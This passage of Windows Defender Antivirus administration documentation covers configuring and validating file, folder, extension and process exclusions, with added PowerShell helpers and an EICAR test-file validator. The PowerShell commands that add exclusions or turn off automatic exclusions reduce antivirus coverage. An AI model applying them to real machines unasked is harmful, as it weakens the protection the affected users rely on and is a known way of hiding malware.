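    $mp = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
    if (-not (Test-Path $mp))   { throw "MpCmdRun.exe not found at $mp" }
    if (-not (Test-Path $Path)) { throw "Scan target does not exist: $Path" }

    # ScanType 3 = custom scan of the given file or folder (1 = quick, 2 = full).
    $mpArgs = @('-Scan', '-ScanType', '3', '-File', $Path)
    if ($DisableRemediation) { $mpArgs += '-DisableRemediation' }
    if ($BootSectorScan)     { $mpArgs += '-BootSectorScan' }
    $mpArgs += @('-Timeout', $TimeoutDays)

    $started = Get-Date
    $output  = & $mp @mpArgs 2>&1
    $code    = $LASTEXITCODE

    $result = [pscustomobject]@{
        Path         = $Path
        Started      = $started
        DurationSec  = [int]((Get-Date) - $started).TotalSeconds
        ExitCode     = $code
        # Assumption: 0 = clean, 2 = threats found, anything else = inspect Output.
        Clean        = ($code -eq 0)
        ThreatsFound = ($code -eq 2)
        Output       = $output
    }
    $summary = '{0:u} scan "{1}" exit={2} threats={3} seconds={4}' -f `
        $result.Started, $Path, $code, $result.ThreatsFound, $result.DurationSec
    Add-Content -Path $LogPath -Value $summary
    $result
}

# Usage:
#   $r = Invoke-MpCmdRunScan -Path 'C:\Shares\Inbound' -DisableRemediation
#   if (-not $r.Clean) { $r.Output }   # hand the tool's own listing to the analyst
```

Keeping the raw output alongside the exit code matters: the listing names the detections, and a non-zero code that is neither 0 nor 2 usually means the scan did not complete rather than that the path is clean.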

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Customize, initiate, and review the results of
Windows Defender Antivirus scans and remediation
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can use Group Policy, PowerShell, and Windows Management Instrumentation (WMI) to configure
Windows Defender Antivirus scans.

In this section
TOPIC | DESCRIPTION
Configure and validate file, folder, and process-opened file exclusions in Windows Defender Antivirus scans | You can exclude files (including files modified by specified processes) and folders from on-demand scans, scheduled scans, and always-on real-time protection monitoring and scanning
Configure Windows Defender Antivirus scanning options | You can configure Windows Defender Antivirus to include certain types of email storage files, back-up or reparse points, and archived files (such as .zip files) in scans. You can also enable network file scanning
Configure remediation for scans | Configure what Windows Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder
Configure scheduled scans | Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans
Configure and run scans | Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app
Review scan results | Review the results of scans using System Center Configuration Manager, Microsoft Intune, or the Windows Security app
Configure and validate exclusions for Windows
Defender Antivirus scans
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can exclude certain files, folders, processes, and process-opened files from Windows Defender Antivirus
scans.
The exclusions apply to scheduled scans, on-demand scans, and always-on real-time protection and
monitoring. Exclusions for process-opened files only apply to real-time protection.
Exclusions can be useful to avoid incorrect detections on files or software that are unique or customized to your
organization.
Windows Server 2016 also features automatic exclusions that are defined by the server roles you enable. See
the Windows Defender Antivirus exclusions on Windows Server 2016 topic for more information and a list of
the automatic exclusions.

WARNING
Defining exclusions lowers the protection offered by Windows Defender Antivirus. You should always evaluate the risks
that are associated with implementing exclusions, and you should only exclude files that you are confident are not
malicious.

In this section
TOPIC | DESCRIPTION
Configure and validate exclusions based on file name, extension, and folder location | Exclude files from Windows Defender Antivirus scans based on their file extension, file name, or location
Configure and validate exclusions for files opened by processes | Exclude files from scans that have been opened by a specific process
Configure Windows Defender Antivirus exclusions on Windows Server | Windows Server 2016 includes automatic exclusions, based on the defined server role. You can also add custom exclusions.
Configure and validate exclusions based on file extension and
folder location
5/3/2019 • 10 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Windows Defender Advanced Threat Protection does not adhere to Windows Defender Antivirus exclusion settings. This means that any
Windows Defender exclusions, no matter how you created them, are not applied by Windows Defender ATP.

You can exclude certain files from Windows Defender Antivirus scans by modifying exclusion lists.
Generally, you shouldn't need to apply exclusions. Windows Defender Antivirus includes a number of automatic exclusions based on
known operating system behaviors and typical management files, such as those used in enterprise management, database
management, and other enterprise scenarios and situations.

NOTE
Automatic exclusions apply only to Windows Server 2016 and above.

TIP
The default antimalware policy we deploy at Microsoft doesn't set any exclusions by default.

This topic describes how to configure exclusion lists for the following:

EXCLUSION | EXAMPLES | EXCLUSION LIST
Any file with a specific extension | All files with the .test extension, anywhere on the machine | Extension exclusions
Any file under a specific folder | All files under the c:\test\sample folder | File and folder exclusions
A specific file in a specific folder | The file c:\sample\sample.test only | File and folder exclusions
A specific process | The executable file c:\test\process.exe | File and folder exclusions

This means the exclusion lists have the following characteristics:
Folder exclusions will apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point
subfolders must be excluded separately.
File extensions will apply to any file name with the defined extension if a path or folder is not defined.

IMPORTANT
The use of wildcards such as the asterisk (*) will alter how the exclusion rules are interpreted. See the Use wildcards in the file name and folder
path or extension exclusion lists section for important information about how wildcards work.
You cannot exclude mapped network drives. You must specify the actual network path.
Folders that are reparse points that are created after the Windows Defender Antivirus service starts and that have been added to the exclusion
list will not be included. You must restart the service (by restarting Windows) for new reparse points to be recognized as a valid exclusion target.

To exclude files opened by a specific process, see Configure and validate exclusions for files opened by processes.
The exclusions apply to scheduled scans, on-demand scans, and real-time protection.
IMPORTANT
Exclusion list changes made with Group Policy will show in the lists in the Windows Security app.
Changes made in the Windows Security app will not show in the Group Policy lists.

By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and
WMI) will be merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy
lists will take precedence in case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override managed
deployment settings.

Configure the list of exclusions based on folder name or file extension
Use Intune to configure file name, folder, or file extension exclusions:
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction settings for
Windows 10 in Intune for more details.
Use Configuration Manager to configure file name, folder, or file extension exclusions:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center Configuration
Manager (current branch).
Use Group Policy to configure folder or file extension exclusions:

NOTE
If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and subdirectories
under that folder are excluded.

1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy
Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click the Path Exclusions setting and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each folder on its own line under the Value name column. If you are entering a file, ensure you enter a fully
qualified path to the file, including the drive letter, folder path, filename, and extension. Enter 0 in the Value column.
5. Click OK.
6. Double-click the Extension Exclusions setting and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each file extension on its own line under the Value name column. Enter 0 in the Value column.
7. Click OK.
Use PowerShell cmdlets to configure file name, folder, or file extension exclusions:
Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of
three cmdlets and the appropriate exclusion list parameter. The cmdlets are all in the Defender module.
The format for the cmdlets is:

<cmdlet> -<exclusion list> "<item>"

The following are allowed as the <cmdlet>:

CONFIGURATION ACTION | POWERSHELL CMDLET
Create or overwrite the list | Set-MpPreference
Add to the list | Add-MpPreference
Remove item from the list | Remove-MpPreference

The following are allowed as the <exclusion list>:

EXCLUSION TYPE | POWERSHELL PARAMETER
All files with a specified file extension | -ExclusionExtension
All files under a folder (including files in subdirectories), or a specific file | -ExclusionPath

IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference , using the Set-MpPreference cmdlet again will overwrite the
existing list.

For example, the following code snippet would cause Windows Defender AV scans to exclude any file with the .test file extension:
Add-MpPreference -ExclusionExtension ".test"

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how
to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to configure file name, folder, or file extension exclusions:
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:

ExclusionExtension
ExclusionPath

The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference, Add-MpPreference, and
Remove-MpPreference.

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs
Use the Windows Security app to configure file name, folder, or file extension exclusions:
See Add exclusions in the Windows Security app for instructions.

Use wildcards in the file name and folder path or extension exclusion lists
You can use the asterisk *, question mark ?, or environment variables (such as %ALLUSERSPROFILE%) as wildcards when defining
items in the file name or folder path exclusion list. The way in which these wildcards are interpreted differs from their usual usage in
other apps and languages, so you should read this section to understand their specific limitations.

IMPORTANT
There are key limitations and usage scenarios for these wildcards:
Environment variable usage is limited to machine variables and those applicable to processes running as an NT AUTHORITY\SYSTEM account.
You cannot use a wildcard in place of a drive letter.
An asterisk * in a folder exclusion will stand in place for a single folder. Use multiple instances of \*\ to indicate multiple nested folders
with unspecified names.

The following table describes how the wildcards can be used and provides some examples.

* (asterisk)
  Use in file and file extension exclusions: Replaces any number of characters. Only applies to files in the last folder defined in
  the argument.
  Use in folder exclusions: Replaces a single folder. Use multiple * with folder slashes \ to indicate multiple, nested folders. After
  matching to the number of wildcarded and named folders, all subfolders will also be included.
  Example use:
    1. C:\MyData\*.txt
    2. C:\somepath\*\Data
    3. C:\Serv\*\*\Backup
  Example matches:
    1. C:\MyData\notes.txt
    2. Any file in C:\somepath\Archives\Data and its subfolders, or in C:\somepath\Authorized\Data and its subfolders
    3. Any file in C:\Serv\Primary\Denied\Backup and its subfolders, or in C:\Serv\Secondary\Allowed\Backup and its subfolders

? (question mark)
  Use in file and file extension exclusions: Replaces a single character. Only applies to files in the last folder defined in the
  argument.
  Use in folder exclusions: Replaces a single character in a folder name. After matching to the number of wildcarded and named
  folders, all subfolders will also be included.
  Example use:
    1. C:\MyData\my?.zip
    2. C:\somepath\?\Data
    3. C:\somepath\test0?\Data
  Example matches:
    1. C:\MyData\my1.zip
    2. Any file in C:\somepath\P\Data and its subfolders
    3. Any file in C:\somepath\test01\Data and its subfolders

Environment variables
  Use in file and file extension exclusions: The defined variable will be populated as a path when the exclusion is evaluated.
  Use in folder exclusions: Same as file and extension use.
  Example use:
    1. %ALLUSERSPROFILE%\CustomLogFiles
  Example matches:
    1. C:\ProgramData\CustomLogFiles\Folder

IMPORTANT
If you mix a file exclusion argument with a folder exclusion argument, the rules will stop at the file argument match in the matched folder, and will
not look for file matches in any subfolders.
For example, you can exclude all files that start with "date" in the folders c:\data\final\marked and c:\data\review\marked by using the rule
argument c:\data\*\marked\date*.*.
This argument, however, will not match any files in subfolders under c:\data\final\marked or c:\data\review\marked.
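The rules in the table and the IMPORTANT note above are easy to misread, so here is an added reference model of them (not Defender's own matcher, and not code from the original article): it encodes the stated semantics and checks a proposed exclusion against concrete file paths, using the table's own examples plus the mixed file/folder caveat. Two things are assumptions of the model rather than statements on the page: a last path segment containing "." is treated as a file or extension pattern and anything else as a folder exclusion, and the environment-variable map is a constructed one so the script runs offline.

```powershell
# Added example (not from the original article): a reference model of the
# wildcard rules documented above for file, extension and folder exclusions.
# It is not Defender's own matcher; it encodes the stated rules so that a
# proposed exclusion can be checked against concrete paths before deployment.
# Model assumption: a last path segment containing '.' is treated as a file or
# extension pattern; any other last segment is treated as a folder exclusion.

# Constructed environment map so the example is deterministic and offline.
# Defender itself resolves machine variables in the SYSTEM context.
$ModelEnv = @{ ALLUSERSPROFILE = 'C:\ProgramData' }

function Expand-ModelEnv {
    param([string]$Text)
    foreach ($name in $ModelEnv.Keys) {
        $Text = $Text -ireplace [regex]::Escape("%$name%"), $ModelEnv[$name]
    }
    return $Text
}

function ConvertTo-SegmentRegex {
    # '*' matches any run of characters within one segment, '?' exactly one.
    param([string]$Segment)
    $escaped = [regex]::Escape($Segment)
    $escaped = $escaped -replace '\\\*', '[^\\]*'
    $escaped = $escaped -replace '\\\?', '[^\\]'
    return "^$escaped$"
}

function Test-ModelExclusion {
    param([Parameter(Mandatory)][string]$Pattern, [Parameter(Mandatory)][string]$FilePath)
    $pSeg = (Expand-ModelEnv $Pattern).TrimEnd('\') -split '\\'
    $fSeg = $FilePath -split '\\'
    if ($pSeg[0] -match '[*?]') { throw "A wildcard cannot stand in for a drive letter: $Pattern" }

    $isFilePattern = $pSeg[-1] -like '*.*'
    $folderCount   = if ($isFilePattern) { $pSeg.Count - 1 } else { $pSeg.Count }
    if ($fSeg.Count -le $folderCount) { return $false }   # nothing below the folders

    # Each wildcarded folder segment stands in for exactly one folder.
    for ($i = 0; $i -lt $folderCount; $i++) {
        if ($fSeg[$i] -notmatch (ConvertTo-SegmentRegex $pSeg[$i])) { return $false }
    }
    if ($isFilePattern) {
        # File and extension patterns apply only to the last folder: no subfolders.
        if ($fSeg.Count -ne $pSeg.Count) { return $false }
        return [bool]($fSeg[-1] -match (ConvertTo-SegmentRegex $pSeg[-1]))
    }
    return $true   # folder exclusion: the matched folder and all of its subfolders
}

# The table's examples plus the mixed file/folder caveat, as constructed checks.
$Checks = @(
    @{ Pattern = 'C:\MyData\*.txt';                  Path = 'C:\MyData\notes.txt';                       Expect = $true  }
    @{ Pattern = 'C:\MyData\*.txt';                  Path = 'C:\MyData\archive\notes.txt';               Expect = $false }
    @{ Pattern = 'C:\somepath\*\Data';               Path = 'C:\somepath\Archives\Data\q\report.csv';    Expect = $true  }
    @{ Pattern = 'C:\somepath\*\Data';               Path = 'C:\somepath\A\B\Data\report.csv';           Expect = $false }
    @{ Pattern = 'C:\Serv\*\*\Backup';               Path = 'C:\Serv\Primary\Denied\Backup\full.bak';    Expect = $true  }
    @{ Pattern = 'C:\MyData\my?.zip';                Path = 'C:\MyData\my1.zip';                         Expect = $true  }
    @{ Pattern = 'C:\somepath\test0?\Data';          Path = 'C:\somepath\test01\Data\x.log';             Expect = $true  }
    @{ Pattern = 'c:\data\*\marked\date*.*';         Path = 'c:\data\final\marked\date2019.txt';         Expect = $true  }
    @{ Pattern = 'c:\data\*\marked\date*.*';         Path = 'c:\data\final\marked\old\date2019.txt';     Expect = $false }
    @{ Pattern = '%ALLUSERSPROFILE%\CustomLogFiles'; Path = 'C:\ProgramData\CustomLogFiles\Folder\a.log'; Expect = $true }
)
foreach ($c in $Checks) {
    $got  = Test-ModelExclusion -Pattern $c.Pattern -FilePath $c.Path
    $mark = if ($got -eq $c.Expect) { 'ok  ' } else { 'FAIL' }
    '{0} {1,-34} {2,-48} -> {3}' -f $mark, $c.Pattern, $c.Path, $got
}
```

Two of the checks encode the caveats that most often surprise administrators: C:\somepath\*\Data does not reach C:\somepath\A\B\Data because each * stands for exactly one folder, and c:\data\*\marked\date*.* does not reach files in a subfolder of marked because a file argument stops at the matched folder. When a real exclusion behaves differently from the model, MpCmdRun -CheckExclusion (described under Review the list of exclusions) is the authoritative answer.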

Review the list of exclusions


You can retrieve the items in the exclusion list with Intune, System Center Configuration Manager, MpCmdRun, PowerShell, or the
Windows Security app.

IMPORTANT
Exclusion list changes made with Group Policy will show in the lists in the Windows Security app.
Changes made in the Windows Security app will not show in the Group Policy lists.

If you use PowerShell, you can retrieve the list in two ways:
Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on separate lines, but the
items within each list will be combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of
Add-MpPreference is written to a new line.

Validate the exclusion list by using MpCmdRun:


To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:

MpCmdRun.exe -CheckExclusion -path <path>

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in December 2018) or later.

Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using PowerShell:
Use the following cmdlet:

Get-MpPreference

In the following example, the items contained in the ExclusionExtension list are highlighted:
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how
to use PowerShell with Windows Defender Antivirus.
Retrieve a specific exclusions list by using PowerShell:
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name
the variable:

$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionExtension
$WDAVprefs.ExclusionPath

In the following example, the list is split into new lines for each use of the Add-MpPreference cmdlet:

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how
to use PowerShell with Windows Defender Antivirus.

Validate exclusions lists with the EICAR test file


You can validate that your exclusion lists are working by using PowerShell with either the Invoke-WebRequest cmdlet or the .NET
WebClient class to download a test file.
In the following PowerShell snippet, replace test.txt with a file that conforms to your exclusion rules. For example, if you have
excluded the .testing extension, replace test.txt with test.testing. If you are testing a path, ensure you run the cmdlet within that path.

Invoke-WebRequest "http://www.eicar.org/download/eicar.com.txt" -OutFile "test.txt"

If Windows Defender Antivirus reports malware, then the rule is not working. If there is no report of malware, and the downloaded
file exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the
EICAR testfile website.
You can also use the following PowerShell code, which calls the .NET WebClient class to download the test file. As with the
Invoke-WebRequest cmdlet, replace c:\test.txt with a file that conforms to the rule you are validating:

$client = new-object System.Net.WebClient
$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")

If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the
following PowerShell command:
[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')

You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to
exclude.
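The validation procedure above, combined with the MpCmdRun -CheckExclusion query from Review the list of exclusions, as one added script that is not part of the original article. It writes the EICAR string offline (no download needed), waits for real-time protection to react, and reports whether the file survived. Assumptions: MpCmdRun.exe is under $env:ProgramFiles\Windows Defender (on machines with platform updates it may live under the Platform folder instead), real-time protection is on, and the detection-history cross-check relies on the Resources property of Get-MpThreatDetection naming the file path. The probe path is a constructed placeholder.

```powershell
# Added example (not from the original article): validate a file, extension or
# folder exclusion two ways without Internet access. First ask the engine with
# MpCmdRun -CheckExclusion, then write an EICAR test file at the candidate path
# and see whether real-time protection leaves it alone.
# Assumptions: MpCmdRun.exe under $env:ProgramFiles\Windows Defender, real-time
# protection enabled, Get-MpThreatDetection exposing a Resources property.

$MpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
$Eicar    = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

function Test-ExclusionOffline {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$WaitSeconds = 10
    )
    # 1. Ask the engine whether the path is covered by an exclusion.
    $check = & $MpCmdRun -CheckExclusion -path $Path 2>&1 | Out-String

    # 2. Write the EICAR string to the path. If the exclusion works the file
    #    survives; if not, real-time protection removes it almost immediately.
    $dir = Split-Path -Parent $Path
    if ($dir -and -not (Test-Path -LiteralPath $dir)) {
        New-Item -ItemType Directory -Path $dir | Out-Null
    }
    [IO.File]::WriteAllText($Path, $Eicar)
    Start-Sleep -Seconds $WaitSeconds
    $survived = Test-Path -LiteralPath $Path

    # 3. Cross-check the detection history: an entry naming this path means the
    #    exclusion did not apply even if the file happens to still exist.
    $detected = @(Get-MpThreatDetection | Where-Object { $_.Resources -like "*$Path*" }).Count -gt 0

    [pscustomobject]@{
        Path             = $Path
        CheckExclusion   = $check.Trim()
        FileSurvived     = $survived
        DetectionLogged  = $detected
        ExclusionWorking = ($survived -and -not $detected)
    }
}

# Constructed usage: validate an extension exclusion for ".testing" by writing
# a probe file with that extension. Delete the probe afterwards.
Test-ExclusionOffline -Path 'C:\ExampleApp\Data\probe.testing' | Format-List
```

Read the three result fields together: CheckExclusion tells you what the engine believes about the path, FileSurvived tells you what real-time protection actually did, and DetectionLogged catches the case where the file was detected and restored or allowed by a separate action. A working exclusion shows all three in agreement; disagreement usually means the wildcard did not match the way you expected.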

Related topics
Configure and validate exclusions in Windows Defender Antivirus scans
Configure and validate exclusions for files opened by processes
Configure Windows Defender Antivirus exclusions on Windows Server
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Configure exclusions for files opened by processes
4/5/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can exclude files that have been opened by specific processes from Windows Defender Antivirus scans.
This topic describes how to configure exclusion lists for the following:

Exclusion: Any file on the machine that is opened by any process with a specific file name
Example: Specifying "test.exe" would exclude files opened by:
  c:\sample\test.exe
  d:\internal\files\test.exe

Exclusion: Any file on the machine that is opened by any process under a specific folder
Example: Specifying "c:\test\sample\*" would exclude files opened by:
  c:\test\sample\test.exe
  c:\test\sample\test2.exe
  c:\test\sample\utility.exe

Exclusion: Any file on the machine that is opened by a specific process in a specific folder
Example: Specifying "c:\test\process.exe" would exclude files only opened by c:\test\process.exe

When you add a process to the process exclusion list, Windows Defender Antivirus won't scan files opened by
that process, no matter where the files are located. The process itself, however, will be scanned unless it has also
been added to the file exclusion list.
The exclusions only apply to always-on real-time protection and monitoring. They don't apply to scheduled or
on-demand scans.
Changes made with Group Policy to the exclusion lists will show in the lists in the Windows Security app.
However, changes made in the Windows Security app will not show in the Group Policy lists.
You can add, remove, and review the lists for exclusions in Group Policy, System Center Configuration Manager,
Microsoft Intune, and with the Windows Security app, and you can use wildcards to further customize the lists.
You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including reviewing your lists.
By default, local changes made to the lists (by users with administrator privileges; this includes changes made
with PowerShell and WMI) will be merged with the lists as defined (and deployed) by Group Policy,
Configuration Manager, or Intune. The Group Policy lists will take precedence in the case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override
managed deployment settings.

Configure the list of exclusions for files opened by specified processes


Use Microsoft Intune to exclude files that have been opened by specified processes from scans:
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction
settings for Windows 10 in Intune for more details.
Use System Center Configuration Manager to exclude files that have been opened by specified
processes from scans:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center
Configuration Manager (current branch).
Use Group Policy to exclude files that have been opened by specified processes from scans:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click Process Exclusions and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each process on its own line under the Value name column. See the example table for the
different types of process exclusions. Enter 0 in the Value column for all processes.
5. Click OK.

Use PowerShell cmdlets to exclude files that have been opened by specified processes from scans:
Using PowerShell to add or remove exclusions for files that have been opened by processes requires using a
combination of three cmdlets with the -ExclusionProcess parameter. The cmdlets are all in the Defender
module.
The format for the cmdlets is:

<cmdlet> -ExclusionProcess "<item>"

The following are allowed as the <cmdlet>:

CONFIGURATION ACTION           POWERSHELL CMDLET
Create or overwrite the list   Set-MpPreference
Add to the list                Add-MpPreference
Remove items from the list     Remove-MpPreference

IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference, using the Set-MpPreference cmdlet
again will overwrite the existing list.

For example, the following code snippet would cause Windows Defender AV scans to exclude any file that is
opened by the specified process:

Add-MpPreference -ExclusionProcess "c:\internal\test.exe"

See Manage antivirus with PowerShell cmdlets and Defender cmdlets for more information on how to use PowerShell with Windows
Defender Antivirus.
Use Windows Management Instrumentation (WMI) to exclude files that have been opened by specified
processes from scans:
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:

ExclusionProcess

The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference,
Add-MpPreference, and Remove-MpPreference.

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs
Use the Windows Security app to exclude files that have been opened by specified processes from
scans:
See Add exclusions in the Windows Security app for instructions.

Use wildcards in the process exclusion list


The use of wildcards in the process exclusion list is different from their use in other exclusion lists.
In particular, you cannot use the question mark ? wildcard, and the asterisk * wildcard can only be used at the
end of a complete path. You can still use environment variables (such as %ALLUSERSPROFILE%) as wildcards
when defining items in the process exclusion list.
The following table describes how the wildcards can be used in the process exclusion list:

* (asterisk)
  Use: Replaces any number of characters
  Example use: C:\MyData\*
  Example matches: Any file opened by C:\MyData\file.exe

? (question mark)
  Use: Not available
  Example use: -
  Example matches: -

Environment variables
  Use: The defined variable will be populated as a path when the exclusion is evaluated
  Example use: %ALLUSERSPROFILE%\CustomLogFiles\file.exe
  Example matches: Any file opened by C:\ProgramData\CustomLogFiles\file.exe
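Because the process list accepts a narrower wildcard syntax than the file and folder lists, entries are easy to get wrong when copied from a folder exclusion. The added check below is not from the original article; it encodes the rules stated above (no ?, a single * only at the end of a complete path, environment variables passed through) and flags offending entries before they are deployed. Treating "end of a complete path" as "the entry ends in \*" is this check's reading of the rule; the sample entries are constructed.

```powershell
# Added example (not from the original article): lint process-exclusion entries
# against the wildcard rules for the process list before deploying them.
# Rules encoded: '?' is not allowed; '*' may appear once, only as the final
# segment of a complete path (entry ends in '\*'); environment variables are
# accepted as written. Sample entries below are constructed.

function Test-ProcessExclusionEntry {
    param([Parameter(Mandatory)][string]$Entry)
    $problems = @()
    if ($Entry -match '\?') {
        $problems += "'?' is not supported in process exclusions"
    }
    $stars = ([regex]::Matches($Entry, '\*')).Count
    if ($stars -gt 1 -or ($stars -eq 1 -and -not $Entry.EndsWith('\*'))) {
        $problems += "'*' may only appear once, at the end of a complete path (for example C:\MyData\*)"
    }
    [pscustomobject]@{
        Entry    = $Entry
        Valid    = ($problems.Count -eq 0)
        Problems = ($problems -join '; ')
    }
}

@(
    'C:\MyData\*'                                   # valid: trailing wildcard
    '%ALLUSERSPROFILE%\CustomLogFiles\file.exe'     # valid: environment variable
    'test.exe'                                      # valid: bare process name
    'C:\MyData\file?.exe'                           # invalid: ? not supported
    'C:\MyData\*\tool.exe'                          # invalid: * not at the end
    'C:\MyData\tool*.exe'                           # invalid: * not a complete trailing segment
) | ForEach-Object { Test-ProcessExclusionEntry $_ } | Format-Table -AutoSize
```

Run the lint over the list you intend to push through Group Policy or Add-MpPreference -ExclusionProcess; an entry that fails here would either be rejected or, worse, silently match nothing, leaving the application it was meant to exempt still scanned.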

Review the list of exclusions


You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, System Center Configuration
Manager, Intune, or the Windows Security app.
If you use PowerShell, you can retrieve the list in two ways:
Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on
separate lines, but the items within each list will be combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are
interested in. Each use of Add-MpPreference is written to a new line.

Validate the exclusion list by using MpCmdRun:


To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:

MpCmdRun.exe -CheckExclusion -path <path>

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in
December 2018) or later.

Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using
PowerShell:
Use the following cmdlet:

Get-MpPreference

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Retrieve a specific exclusions list by using PowerShell:
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever
label you want to name the variable:

$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionProcess

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.

Related topics
Configure and validate exclusions in Windows Defender Antivirus scans
Configure and validate exclusions based on file name, extension, and folder location
Configure Windows Defender Antivirus exclusions on Windows Server
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Configure Windows Defender Antivirus exclusions
on Windows Server
4/8/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus on Windows Server 2016 computers automatically enrolls you in certain
exclusions, as defined by your specified server role. See the end of this topic for a list of these exclusions.
These exclusions will not appear in the standard exclusion lists shown in the Windows Security app.
You can still add or remove custom exclusions (in addition to the server role-defined automatic exclusions) as
described in these exclusion-related topics:
Configure and validate exclusions based on file name, extension, and folder location
Configure and validate exclusions for files opened by processes
Custom exclusions take precedence over automatic exclusions.

TIP
Custom and duplicate exclusions do not conflict with automatic exclusions.

Windows Defender Antivirus uses the Deployment Image Servicing and Management (DISM ) tools to
determine which roles are installed on your computer.

Opt out of automatic exclusions


In Windows Server 2016, the predefined exclusions delivered by Security intelligence updates only exclude the
default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually
control the set of exclusions, you need to opt out of the automatic exclusions delivered in Security intelligence
updates.

WARNING
Opting out of automatic exclusions may adversely impact performance, or result in data corruption. The exclusions that
are delivered automatically are optimized for Windows Server 2016 roles.

NOTE
This setting is only supported on Windows Server 2016. While this setting exists in Windows 10, it doesn't have an effect
on exclusions.
TIP
Since the predefined exclusions only exclude default paths, if you move NTDS and SYSVOL to another drive or path
different than the original one, you would have to manually add the exclusions using the information here.

You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and WMI.
Use Group Policy to disable the auto-exclusions list on Windows Server 2016:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click Turn off Auto Exclusions and set the option to Enabled. Click OK.
Use PowerShell cmdlets to disable the auto-exclusions list on Windows Server 2016:
Use the following cmdlets:

Set-MpPreference -DisableAutoExclusions $true

